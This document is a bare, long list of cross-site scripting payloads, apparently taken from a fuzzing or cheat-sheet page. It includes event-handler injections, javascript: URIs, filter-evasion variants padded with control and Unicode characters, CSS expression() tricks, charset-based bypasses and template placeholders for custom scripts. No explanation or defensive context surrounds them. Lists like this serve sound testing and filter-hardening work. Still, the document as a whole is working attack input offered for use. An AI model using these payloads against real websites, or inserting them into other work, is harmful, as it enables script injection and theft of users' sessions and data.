"-prompt(8)-" |
link |
'-prompt(8)-' |
link |
";a=prompt,a()// |
link |
';a=prompt,a()// |
link |
"onclick=prompt(8)>"@x.y |
link |
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y |
link |
<image/src/onerror=prompt(8)> |
link |
<img/src/onerror=prompt(8)> |
link |
<image src/onerror=prompt(8)> |
link |
<img src/onerror=prompt(8)> |
link |
<img src =q onerror=prompt(8)> |
link |
</scrip</script>t><img src =q onerror=prompt(8)> |
link |
<script\x20type="text/javascript">javascript:alert(1);</script> |
link |
<script\x3Etype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> |
link |
<script\x09type="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> |
link |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Atype="text/javascript">javascript:alert(1);</script> |
link |
'`"><\x3Cscript>javascript:alert(1)</script> |
link |
'`"><\x00script>javascript:alert(1)</script> |
link |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
link |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> |
link |
<video src=1 href=1 onerror="javascript:alert(1)"></video> |
link |
<body src=1 href=1 onerror="javascript:alert(1)"></body> |
link |
<image src=1 href=1 onerror="javascript:alert(1)"></image> |
link |
<object src=1 href=1 onerror="javascript:alert(1)"></object> |
link |
<script src=1 href=1 onerror="javascript:alert(1)"></script> |
link |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> |
link |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> |
link |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> |
link |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> |
link |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> |
link |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> |
link |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> |
link |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> |
link |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> |
link |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> |
link |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> |
link |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> |
link |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> |
link |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> |
link |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> |
link |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> |
link |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> |
link |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> |
link |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> |
link |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> |
link |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> |
link |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> |
link |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> |
link |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> |
link |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> |
link |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> |
link |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> |
link |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> |
link |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> |
link |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> |
link |
<object onError object onError="javascript:javascript:alert(1)"></object onError> |
link |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> |
link |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> |
link |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> |
link |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> |
link |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> |
link |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> |
link |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> |
link |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> |
link |
<body onload body onload="javascript:javascript:alert(1)"></body onload> |
link |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> |
link |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> |
link |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> |
link |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> |
link |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> |
link |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> |
link |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> |
link |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> |
link |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> |
link |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> |
link |
\x3Cscript>javascript:alert(1)</script> |
link |
'"`><script>/**\x2Fjavascript:alert(1)// */</script> |
link |
<script>javascript:alert(1)</script\x0D |
link |
<script>javascript:alert(1)</script\x0A |
link |
<script>javascript:alert(1)</script\x0B |
link |
<script charset="\x22>javascript:alert(1)</script> |
link |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
"'><img src='#\x27 onerror=javascript:alert(1)> |
link |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> |
link |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> |
link |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<script>/* *\x2A/javascript:alert(1)// */</script> |
link |
<script>/* *\x00/javascript:alert(1)// */</script> |
link |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF |
link |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF |
link |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E |
link |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> |
link |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> |
link |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> |
link |
'`"><\x3Cscript>javascript:alert(1)</script> |
link |
'`"><\x00script>javascript:alert(1)</script> |
link |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> |
link |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> |
link |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> |
link |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> |
link |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> |
link |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> |
link |
<script\x20type="text/javascript">javascript:alert(1);</script> |
link |
<script\x3Etype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> |
link |
<script\x09type="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> |
link |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Atype="text/javascript">javascript:alert(1);</script> |
link |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF |
link |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF |
link |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF |
link |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x20expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x00expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF |
link |
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x22onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Donerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x09onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x0Conerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x00onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x27onerror=javascript:alert(1)> |
link |
"'><img src=xxx:x \x20onerror=javascript:alert(1)> |
link |
"`'><script>\x3Bjavascript:alert(1)</script> |
link |
"`'><script>\x0Djavascript:alert(1)</script> |
link |
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x81javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x84javascript:alert(1)</script> |
link |
"`'><script>\xE3\x80\x80javascript:alert(1)</script> |
link |
"`'><script>\x09javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x89javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x85javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x88javascript:alert(1)</script> |
link |
"`'><script>\x00javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> |
link |
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> |
link |
"`'><script>\x0Cjavascript:alert(1)</script> |
link |
"`'><script>\x2Bjavascript:alert(1)</script> |
link |
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> |
link |
"`'><script>-javascript:alert(1)</script> |
link |
"`'><script>\x0Ajavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> |
link |
"`'><script>\x7Ejavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x87javascript:alert(1)</script> |
link |
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> |
link |
"`'><script>\xC2\x85javascript:alert(1)</script> |
link |
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x83javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> |
link |
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x80javascript:alert(1)</script> |
link |
"`'><script>\x21javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x82javascript:alert(1)</script> |
link |
"`'><script>\xE2\x80\x86javascript:alert(1)</script> |
link |
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> |
link |
"`'><script>\x0Bjavascript:alert(1)</script> |
link |
"`'><script>\x20javascript:alert(1)</script> |
link |
"`'><script>\xC2\xA0javascript:alert(1)</script> |
link |
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> |
link |
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> |
link |
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> |
link |
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> |
link |
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> |
link |
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> |
link |
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> |
link |
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> |
link |
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> |
link |
<script\x2F>javascript:alert(1)</script> |
link |
<script\x20>javascript:alert(1)</script> |
link |
<script\x0D>javascript:alert(1)</script> |
link |
<script\x0A>javascript:alert(1)</script> |
link |
<script\x0C>javascript:alert(1)</script> |
link |
<script\x00>javascript:alert(1)</script> |
link |
<script\x09>javascript:alert(1)</script> |
link |
"'><img src=xxx:x onerror\x0B=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x00=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0C=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0D=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x20=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x0A=javascript:alert(1)> |
link |
"'><img src=xxx:x onerror\x09=javascript:alert(1)> |
link |
<script>javascript:alert(1)<\x00/script> |
link |
<img src=# onerror\x3D"javascript:alert(1)" > |
link |
<input onfocus=javascript:alert(1) autofocus> |
link |
<input onblur=javascript:alert(1) autofocus><input autofocus> |
link |
<video poster=javascript:javascript:alert(1)// |
link |
<video><source onerror="javascript:javascript:alert(1)"> |
link |
<video onerror="javascript:javascript:alert(1)"><source> |
link |
<form><button formaction="javascript:javascript:alert(1)">X |
link |
<body oninput=javascript:alert(1)><input autofocus> |
link |
<table background="javascript:javascript:alert(1)"> |
link |
<!--<img src="--><img src=x onerror=javascript:alert(1)/`/"> |
link |
<comment><img src="</comment><img src=x onerror=javascript:alert(1))`//"> |
link |
<![><img src="]><img src=x onerror=javascript:alert(1)/`/"> |
link |
<style><img src="</style><img src=x onerror=javascript:alert(1)/`/"> |
link |
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> |
link |
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> |
link |
<object data="data:text/html;base64,%(base64)s"> |
link |
<embed src="data:text/html;base64,%(base64)s"> |
link |
<b <script>alert(1)</script>0 |
link |
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)/`/'> |
link |
<img src="javascript:alert(1)"> |
link |
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x |
link |
<? foo="><script>javascript:alert(1)</script>"> |
link |
<! foo="><script>javascript:alert(1)</script>"> |
link |
</ foo="><script>javascript:alert(1)</script>"> |
link |
<? foo="><x foo='?><script>javascript:alert(1)</script>'>"> |
link |
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> |
link |
<% foo><x foo="%><script>javascript:alert(1)</script>"> |
link |
<img \x47src=x onerror="javascript:alert(1)"> |
link |
<img \x11src=x onerror="javascript:alert(1)"> |
link |
<img \x12src=x onerror="javascript:alert(1)"> |
link |
<img\x47src=x onerror="javascript:alert(1)"> |
link |
<img\x10src=x onerror="javascript:alert(1)"> |
link |
<img\x13src=x onerror="javascript:alert(1)"> |
link |
<img\x32src=x onerror="javascript:alert(1)"> |
link |
<img\x47src=x onerror="javascript:alert(1)"> |
link |
<img\x11src=x onerror="javascript:alert(1)"> |
link |
<img \x47src=x onerror="javascript:alert(1)"> |
link |
<img \x34src=x onerror="javascript:alert(1)"> |
link |
<img \x39src=x onerror="javascript:alert(1)"> |
link |
<img \x00src=x onerror="javascript:alert(1)"> |
link |
<img src\x09=x onerror="javascript:alert(1)"> |
link |
<img src\x10=x onerror="javascript:alert(1)"> |
link |
<img src\x13=x onerror="javascript:alert(1)"> |
link |
<img src\x32=x onerror="javascript:alert(1)"> |
link |
<img src\x12=x onerror="javascript:alert(1)"> |
link |
<img src\x11=x onerror="javascript:alert(1)"> |
link |
<img src\x00=x onerror="javascript:alert(1)"> |
link |
<img src\x47=x onerror="javascript:alert(1)"> |
link |
<img src=x\x09onerror="javascript:alert(1)"> |
link |
<img src=x\x10onerror="javascript:alert(1)"> |
link |
<img src=x\x11onerror="javascript:alert(1)"> |
link |
<img src=x\x12onerror="javascript:alert(1)"> |
link |
<img src=x\x13onerror="javascript:alert(1)"> |
link |
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> |
link |
<img src=x onerror=\x09"javascript:alert(1)"> |
link |
<img src=x onerror=\x10"javascript:alert(1)"> |
link |
<img src=x onerror=\x11"javascript:alert(1)"> |
link |
<img src=x onerror=\x12"javascript:alert(1)"> |
link |
<img src=x onerror=\x32"javascript:alert(1)"> |
link |
<img src=x onerror=\x00"javascript:alert(1)"> |
link |
<a href=javascript:javascript:alert(1)>XXX</a> |
link |
<img src="x` `<script>javascript:alert(1)</script>"` `> |
link |
<img src onerror /" '"= alt=javascript:alert(1)//"> |
link |
<title onpropertychange=javascript:alert(1)></title><title title=> |
link |
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)>`</a>"> |
link |
<!--[if]><script>javascript:alert(1)</script --> |
link |
<!--[if<img src=x onerror=javascript:alert(1)/`/]> --> |
link |
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X |
link |
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d |
link |
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> |
link |
<div style="font-family:'foo ;color:red;';">XXX |
link |
<div style="font-family:foo}color=red;">XXX |
link |
<// style=x:expression\28javascript:alert(1)\29> |
link |
<style>*{x:expression(javascript:alert(1))}</style> |
link |
<div style=content:url(%(svg)s)></div> |
link |
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X |
link |
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X |
link |
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X |
link |
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> |
link |
<x style="background:url('x;color:red;/*')">XXX</x> |
link |
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> |
link |
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> |
link |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> |
link |
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> |
link |
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾ |
link |
X<x style=`behavior:url(#default#time2)`onbegin=`javascript:alert(1)`> |
link |
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> |
link |
<event-source src="%(event)s" onload="javascript:alert(1)"> |
link |
<script>%(payload)s</script> |
link |
<script language='javascript' src='%(jscript)s'></script> |
link |
<IMG SRC="javascript:javascript:alert(1);"> |
link |
<IMG SRC=javascript:javascript:alert(1)> |
link |
<IMG SRC=`javascript:javascript:alert(1)`> |
link |
<SCRIPT SRC=%(jscript)s?<B> |
link |
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> |
link |
<BODY ONLOAD=javascript:alert(1)> |
link |
<BODY ONLOAD=javascript:javascript:alert(1)> |
link |
<IMG SRC="jav ascript:javascript:alert(1);"> |
link |
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> |
link |
<IMG SRC="javascript:javascript:alert(1)" |
link |
<iframe src=%(scriptlet)s < |
link |
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> |
link |
<IMG DYNSRC="javascript:javascript:alert(1)"> |
link |
<IMG LOWSRC="javascript:javascript:alert(1)"> |
link |
<BGSOUND SRC="javascript:javascript:alert(1);"> |
link |
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> |
link |
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> |
link |
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> |
link |
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> |
link |
<TABLE BACKGROUND="javascript:javascript:alert(1)"> |
link |
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> |
link |
<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> |
link |
<DIV STYLE="width:expression(javascript:alert(1));"> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> |
link |
<XSS STYLE="xss:expression(javascript:alert(1))"> |
link |
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> |
link |
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> |
link |
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> |
link |
<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> |
link |
<BASE HREF="javascript:javascript:alert(1);//"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> |
link |
<SCRIPT SRC="%(jpg)s"></SCRIPT> |
link |
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X |
link |
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> |
link |
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> |
link |
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> |
link |
